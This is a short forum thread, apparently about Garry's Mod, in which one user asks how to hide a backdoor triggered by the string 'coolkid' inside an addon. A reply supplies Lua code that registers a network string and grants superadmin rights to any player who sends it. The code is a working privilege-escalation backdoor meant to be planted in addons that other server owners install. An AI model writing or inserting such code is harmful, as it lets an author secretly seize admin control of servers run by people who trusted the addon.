How to put backdoor into addonHello i was wondering How do i put a backdoor into a addon i want the string to be "coolkid" as thats the string thats in my backdoor menu for it Thank You any help would be great
Originally Posted by JamesBlunt1364 Hello i was wondering How do i put a backdoor into a addon i want the string to be "coolkid" as thats the string thats in my backdoor menu for it Thank You any help would be great you can just create a network string that for example gives you super admin Code: util.AddNetworkString("something here") net.Receive("something here",function(len,ply) ply:SetUserGroup(superadmin) end) https://wiki.facepunch.com/gmod/util.AddNetworkString https://wiki.facepunch.com/gmod/net.Start https://wiki.facepunch.com/gmod/net.Receive